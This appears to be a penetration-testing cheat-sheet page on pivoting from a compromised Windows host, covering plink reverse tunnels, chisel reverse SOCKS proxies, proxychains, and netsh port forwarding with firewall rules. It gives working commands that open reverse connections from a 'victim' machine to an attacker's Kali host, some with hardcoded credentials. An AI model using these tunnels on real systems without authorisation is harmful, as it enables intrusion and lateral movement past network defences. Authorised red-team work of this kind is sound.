Window

Plink

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

First: We need to change ssh configuration on our kali machine.

PermitRootLogin no    #Change This
PermitRootLogin Yes     #To This

#Then restart the service
sudo service ssh restart

We can customize the port if port 22 blocked on the report machine.

Second: Let start execute plink command on the victim machine 

plink.exe -P 2222 -l root -pw toor -R 445:127.0.0.1:445 10.10.14.12

Plink with id_rsa

  • Create ssh-keygen and save .pub value into authorized_key

  • install putty tool and convert id_rsa to .ppk file

└─$ sudo apt install putty-tools
└─$ puttygen id_rsa -o key.ppk

  • Transfer key.ppk to window machine that we compromised

  • on window machine, we can use plink to connect to our kali machine fore reverse port

Desktop>plink.exe -R 445:192.168.33.132:445 pwned@10.104.60.242 -i key.ppk -N
Using username "pwned".
Access granted. Press Return to begin session.

We can access via 127.0.0.1:445

Chisel

On kali machine 

./chisel server -p 6666 --socks5 –reverse

on window server machine

chisel.exe client 10.10.10.10:6666 R:1080:socks

Then we can use proxychain for remote to target machine via sock proxy

proxychains xfreerdp /u:user /p:password123 /cert:ignore /v:10.10.10.11

Proxychains on Window machine

  • Create ssh-keygen without password. It will create to file id_rsa and id_rsa.pub

  • copy value of idrsa.pub and paste into .ssh/authorized_key file

  • Transfer id_rsa file to window machine we compromise

  • Connect ssh back to our kali machine

ssh -R 9050 pwned@10.104.60.242 -i id_rsa -f -N

Then on our kali will open port 9050

chisel

https://github.com/jpillora/chisel/releases

  • On server (kali machine)

└─$ chisel server -p 8888 --reverse &

  • On client (Window)

chisel-window.exe client 10.104.60.242:8888 R:9050:socks &
2022/05/10 03:18:16 client: Connecting to ws://10.104.60.242:8888
2022/05/10 03:18:16 client: Connected (Latency 153.9µs)

on /etc/proxychains4.conf

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"

socks5  127.0.0.1 9050

Netsh

netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp

Where:

  • listenaddress is the IP address to listen on (probably always 0.0.0.0).

  • listenport is the port to listen on.

  • connectaddress is the destination IP address.

  • connectport is the destination port.

  • protocol to use (always TCP).

Example:

PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=80 connectaddress=192.168.10.1 connectport=80 protocol=tcp

PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=443 connectaddress=192.168.10.1 connectport=443 protocol=tcp

Show the portproxy:

PS C:\>netsh interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         80          192.168.10.1    80
0.0.0.0         443         192.168.10.1    443

Remove the portproxy:

PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=80
PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=443

Create Local Firewall Rule before netsh

PS C:\>New-NetFirewallRule -DisplayName "80-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80
PS C:\>New-NetFirewallRule -DisplayName "443-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 443

Remove Local Firewall Rule

PS C:\>Remove-NetFirewallRule -DisplayName "80-In"
PS C:\>Remove-NetFirewallRule -DisplayName "443-In"
PreviousLinuxNextWeb Application

Last updated